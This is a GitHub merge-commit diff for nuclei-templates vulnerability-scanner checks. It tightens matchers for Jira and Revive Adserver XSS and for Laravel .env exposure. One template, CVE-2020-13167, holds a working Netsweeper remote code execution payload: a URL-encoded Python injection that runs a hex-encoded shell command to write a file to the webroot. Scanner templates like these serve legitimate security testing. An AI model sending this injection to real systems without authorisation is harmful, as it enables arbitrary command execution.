Merge pull request #226 from dwisiswant0/fix-false-positives

Fix multiple false-positives
projectdiscovery · Jul 9, 2020 · 08e0822 · 08e0822
2 parents eb87a5d + a4f0508
commit 08e0822
Show file tree

Hide file tree

Showing 4 changed files with 15 additions and 15 deletions.
diff --git a/cves/CVE-2018-20824.yaml b/cves/CVE-2018-20824.yaml
@@ -2,7 +2,7 @@ id: CVE-2018-20824
 
 info:
  name: Atlassian Jira WallboardServlet XSS
- author: madrobot
+ author: madrobot & dwisiswant0
  severity: medium
 
 requests:
@@ -14,7 +14,7 @@ requests:
  - type: status
  status:
  - 200
- - type: word
- words:
- - alert(document.domain)
+ - type: regex
+ regex:
+ - (?mi)timeout:\salert\(document\.domain\)
  part: body
diff --git a/cves/CVE-2020-13167.yaml b/cves/CVE-2020-13167.yaml
@@ -23,9 +23,9 @@ info:
 requests:
  - method: GET
  path:
- # Payload on hex: echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/nonexistent
- - "{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6e6f6e6578697374656e74%27.decode%28%27hex%27%29%29%23&timeout=5"
- - "{{BaseURL}}/webadmin/nonexistent"
+ # Payload on hex: echo "bm9uZXhpc3RlbnQ=" | base64 -d > /usr/local/netsweeper/webadmin/out
+ - "{{BaseURL}}/webadmin/tools/unixlogin.php?login=admin&password=g%27%2C%27%27%29%3Bimport%20os%3Bos.system%28%276563686f2022626d39755a5868706333526c626e513d22207c20626173653634202d64203e202f7573722f6c6f63616c2f6e6574737765657065722f77656261646d696e2f6f7574%27.decode%28%27hex%27%29%29%23&timeout=5"
+ - "{{BaseURL}}/webadmin/out"
  headers:
  Referer: "http://{{Hostname}}/webadmin/admin/service_manager_data.php"
  User-Agent: "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko)"

diff --git a/cves/CVE-2020-8115.yaml b/cves/CVE-2020-8115.yaml
@@ -2,7 +2,7 @@ id: CVE-2020-8115
 
 info:
  name: Revive Adserver XSS
- author: madrobot
+ author: madrobot & dwisiswant0
  severity: medium
 
 requests:
@@ -14,7 +14,7 @@ requests:
  - type: status
  status:
  - 200
- - type: word
- words:
- - "alert(1337)"
+ - type: regex
  part: body
+ regex:
+ - (?mi)window\.location\.replace\(".*alert\(1337\)
diff --git a/files/laravel-env.yaml b/files/laravel-env.yaml
@@ -2,7 +2,7 @@ id: laravel-env
 
 info:
  name: Laravel .env file
- author: pxmme1337
+ author: pxmme1337 & dwisiswant0
  severity: medium
 
 requests:
@@ -11,9 +11,9 @@ requests:
  - "{{BaseURL}}/.env"
  matchers-condition: and
  matchers:
- - type: word
- words:
- - "APP_NAME"
+ - type: regex
+ regex:
+ - "(?m)^APP_(NAME|ENV|KEY|DEBUG|URL)="
  - type: status
  status:
  - 200